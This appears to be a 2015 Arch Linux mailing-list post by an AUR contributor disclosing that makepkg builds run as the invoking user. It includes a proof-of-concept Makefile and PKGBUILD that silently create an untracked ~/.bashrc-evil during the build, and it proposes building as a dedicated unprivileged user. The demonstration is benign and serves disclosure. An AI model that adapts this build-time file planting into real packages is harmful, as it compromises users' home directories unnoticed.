Greetings, I've come across unexpected behavior in makepkg. One of several possible outcomes of this quirk is the ability to create files outside of the build environment. They are not included in the package, so the package manager is unaware of them. Moreover only the build process is affected, installation not a factor. In this manner, these untracked files can propogate to directories with write access by the user. It's unclear if this is a limitation of fakeroot or makepkg but I will continue to investigate. Here is a simple demonstration of this exploit. ========== Makefile ========== install: @wall creating ${HOME}/.bashrc-evil @touch ${HOME}/.bashrc-evil ========== PKGBUILD =========== pkgname=hello-world pkgver=0.1 pkgrel=1 pkgdesc="Friendly package" arch=('any') source=('Makefile') md5sums=(SKIP) build() { cd "$srcdir" make } package() { cd "$srcdir" make DESTDIR="${pkgdir}" install } ================ $ makepkg ==> Making package: hello-world 0.1-1 (Fri Sep 4 15:08:04 GMT 2015) ==> Checking runtime dependencies... ==> Checking buildtime dependencies... ==> Retrieving sources... -> Found Makefile ==> Validating source files with md5sums... Makefile ... Skipped ==> Extracting sources... ==> Removing existing $pkgdir/ directory... ==> Starting build()... Broadcast message from hazard@archlinux (pts/4) (Fri Sep 4 15:08:04 2015): creating /home/hazard/.bashrc-evil ==> Entering fakeroot environment... ==> Starting package()... ERROR: ld.so: object 'libfakeroot.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored. Broadcast message from hazard@archlinux (pts/4) (Fri Sep 4 15:08:05 2015): creating /home/hazard/.bashrc-evil ==> Tidying install... -> Purging unwanted files... -> Compressing man and info pages... -> Stripping unneeded symbols from binaries and libraries... ==> Creating package "hello-world"... -> Generating .PKGINFO file... -> Generating .MTREE file... -> Compressing package... ==> Leaving fakeroot environment. ==> Finished making: hello-world 0.1-1 (Fri Sep 4 15:08:05 GMT 2015) $ tar -tf hello-world-0.1-1-any.pkg.tar.xz .PKGINFO .MTREE $ ls ~/.bashrc-evil /home/hazard/.bashrc-evil $ pacman -Qo ~/.bashrc-evil error: No package owns /home/hazard/.bashrc-evil ================== It should be noted that I only caught this because makepkg failed to build a certain package due to a lack of write access to the home directory (apacman AUR wrapper uses a restricted user to build). There was that controversial change back in pacman 4.2 to prevent makepkg running as root, I propose that makepkg should not run as the current user either but instead a dedicated unprivileged user. See here for more info: github.com/oshazard/apacman/issues/23 Sincerely, hazard (Archlinux BBS and AUR) P.S. apologies if this is a dupe, last message was rejected